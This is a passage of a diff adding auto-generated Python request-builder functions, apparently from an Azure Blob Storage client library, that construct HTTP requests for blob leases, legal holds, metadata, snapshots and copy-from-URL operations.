_SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_delete_immutability_policy_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="DELETE", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_legal_hold_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "legalhold") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + legal_hold = kwargs.pop('legal_hold') # type: bool + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_metadata_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "metadata") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = 
_SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_acquire_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "acquire") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + duration = kwargs.pop('duration', None) # type: Optional[int] + proposed_lease_id = kwargs.pop('proposed_lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + if duration is not None: + _header_parameters['x-ms-lease-duration'] = _SERIALIZER.header("duration", duration, 'int') + if proposed_lease_id is not None: + _header_parameters['x-ms-proposed-lease-id'] = _SERIALIZER.header("proposed_lease_id", proposed_lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_release_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "release") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_renew_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "renew") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_change_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "change") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + proposed_lease_id = kwargs.pop('proposed_lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-proposed-lease-id'] = _SERIALIZER.header("proposed_lease_id", proposed_lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_break_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "break") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + break_period = kwargs.pop('break_period', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + if break_period is not None: + _header_parameters['x-ms-lease-break-period'] = _SERIALIZER.header("break_period", break_period, 'int') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_create_snapshot_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "snapshot") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = 
_SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_start_copy_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + version = kwargs.pop('version', "2021-04-10") # type: str + copy_source = kwargs.pop('copy_source') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + rehydrate_priority = kwargs.pop('rehydrate_priority', None) # type: Optional[Union[str, "_models.RehydratePriority"]] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + source_if_tags = kwargs.pop('source_if_tags', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + seal_blob = kwargs.pop('seal_blob', None) # type: Optional[bool] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if rehydrate_priority is not None: + _header_parameters['x-ms-rehydrate-priority'] = _SERIALIZER.header("rehydrate_priority", rehydrate_priority, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + 
_header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + if source_if_tags is not None: + _header_parameters['x-ms-source-if-tags'] = _SERIALIZER.header("source_if_tags", source_if_tags, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("copy_source", copy_source, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if seal_blob is not None: + _header_parameters['x-ms-seal-blob'] = _SERIALIZER.header("seal_blob", seal_blob, 'bool') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_copy_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + x_ms_requires_sync = kwargs.pop('x_ms_requires_sync', "true") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + copy_source = kwargs.pop('copy_source') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + copy_source_tags = kwargs.pop('copy_source_tags', None) # type: Optional[Union[str, "_models.BlobCopySourceTags"]] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": 